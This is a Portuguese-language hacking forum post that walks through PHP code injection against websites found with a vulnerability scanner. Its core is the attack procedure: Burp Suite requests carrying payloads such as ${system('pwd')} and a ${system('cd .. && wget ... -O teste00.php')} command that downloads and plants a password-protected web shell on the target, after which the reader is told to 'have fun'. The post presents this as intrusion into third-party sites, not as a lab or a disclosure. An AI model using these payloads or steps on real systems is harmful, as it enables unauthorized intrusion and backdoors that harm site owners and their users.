Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

PHP Code Injection


Dark Army
 Compartilhar

Posts Recomendados

O que é?

 

A injeção de código PHP é uma vulnerabilidade que permite que um invasor injete código personalizado no mecanismo de script do servidor, essa vulnerabilidade ocorre quando um invasor pode controlar toda ou parte de uma sequência de entrada que é alimentada em uma chamada de função eval(). Eval executará o argumento como código.

 

*Programas Necessários*
Acutenix 
Burpsuite

 

1. Procure um site com essa vulnerabilidade, utilizando o Acutenix, quando ele achar, ele vai mostrar, como demonstra abaixo:
cats00.thumb.jpg.d12ada7c31acad8a4c331050e80d2bfe.jpg

 

2. Veja o diretório da falha, no caso é: /analitics/piwik.php/analitics
O post data que é enviado: page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=

É necessário se cadastrar para acessar o conteúdo.

 

Agora vamos ao BurpSuite.


*Lembrando, faça a configuração do proxy no Firefox, etc..*
*Creio que você já sabe disso.*

 

Entre no site com o dir da falha pelo Firefox, exemplo:

É necessário se cadastrar para acessar o conteúdo.
e vai no BurpSuite, e clique em "Forward", entre em HTTP History, vá ao site, e clique com botão direito, e clique em Send Repeater.

 

3. Clique em SEND, agora em RAW, coloque o post data do acutenix.
page=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&referrer=http://www.site.com.br/

 

E mude de GET para POST.

 

Se tudo tiver indo bem, vai ficar igual na imagem abaixo:
cats12.thumb.jpg.d8dd479a8f292d35a433d65226dc6f2c.jpg

 

Agora vamos começar a "invasão".

Clique em "Params" e modifique o page, vai está assim: %24%7b%40print(md5(acunetix_wvs_security_test))%7d
Coloque: ${system('pwd')}

 

Vai retornar: /home/var/www/site.com.br/public_html/analitics

 

Agora coloque: cd .. && wget

É necessário se cadastrar para acessar o conteúdo.
-O teste00.php

O comando vai ficar: ${system('cd .. && wget

É necessário se cadastrar para acessar o conteúdo.
-O teste00.php')}

*Pode mudar de shell, caso queira, a senha dessa shell é root*

 

Se a invasão for bem sucedida, vai no site e coloque o nome teste00.php no final.


Exemplo: www.site.com.br/teste00.php, caso for bem sucedido, vai entrar, fique a vontade para se divertir :)

 

*Extra:*

É necessário se cadastrar para acessar o conteúdo.

 ♚ KING RETURN ♚

 

Link para o comentário
Compartilhar em outros sites

Participe da Conversa

Você pode postar agora e se cadastrar mais tarde. Cadastre-se Agora para publicar com Sua Conta.
Observação: sua postagem exigirá aprovação do moderador antes de ficar visível.

Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Responder

×   Você colou conteúdo com formatação.   Remover formatação

  Apenas 75 emoticons são permitidos.

×   Seu link foi incorporado automaticamente.   Exibir como um link em vez disso

×   Seu conteúdo anterior foi restaurado.   Limpar Editor

×   Você não pode colar imagens diretamente. Carregar ou inserir imagens do URL.

 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.